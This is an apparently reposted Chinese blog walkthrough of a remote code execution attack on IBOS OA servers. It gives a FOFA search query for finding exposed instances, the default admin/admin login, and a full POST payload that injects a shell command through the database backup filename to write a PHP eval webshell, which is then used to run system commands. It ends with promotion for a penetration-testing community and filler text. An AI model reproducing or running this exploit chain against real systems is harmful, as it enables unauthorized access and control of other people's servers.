IBOS 数据库模块 远程代码执行漏洞

  • A+
所属分类:安全文章

一、后台弱口令

fofa语句:

body="IBOS" && body="login-panel"

IBOS 数据库模块 远程代码执行漏洞

我们随便点一个进去

IBOS 数据库模块 远程代码执行漏洞

口令:admin/admin

但是经过多次测试发现存在弱口令的只有一两个,这就导致后面的步骤将无法继续进行,所以多找找就好

IBOS 数据库模块 远程代码执行漏洞

二、任意文件上传

这里我们已经到后台了,点通用设置->数据库->开启更多选项->选择系统 MySQL Dump (Shell) 备份这个选项

IBOS 数据库模块 远程代码执行漏洞

往下拉,点提交,抓包

IBOS 数据库模块 远程代码执行漏洞

IBOS 数据库模块 远程代码执行漏洞

在post数据里替换下面内容,上传shell

backuptype=all&custom_enabled=1&method=shell&sizelimit=2048&extendins=0&sqlcompat=MYSQL41&sqlcharset=utf8&usehex=0&usezip=0&filename=a3b4%26echo "<?php eval($_GET[a3b4]);?>">a3b4%PATHEXT:~0,1%php%26a3b4&dbSubmit=1

三、远程代码执行

接着当然就是访问shell了

http://xxx.xxx.xxx.xxx/a3b4.php?cmd=system(%22whoami%22);

IBOS 数据库模块 远程代码执行漏洞

IBOS 数据库模块 远程代码执行漏洞

访问个phpinfo

IBOS 数据库模块 远程代码执行漏洞

因为是win的,那就再来个dir

IBOS 数据库模块 远程代码执行漏洞

到这里结束啦

IBOS 数据库模块 远程代码执行漏洞

推荐一下公众号

bgbing星球:渗透测试,内网渗透,SRC漏洞分享,安全开发,安全武器库

更多渗透测试,可以到星球学习啦(送fofa高级会员)

IBOS 数据库模块 远程代码执行漏洞

凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数

本文始发于微信公众号(bgbing安全):IBOS 数据库模块 远程代码执行漏洞

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: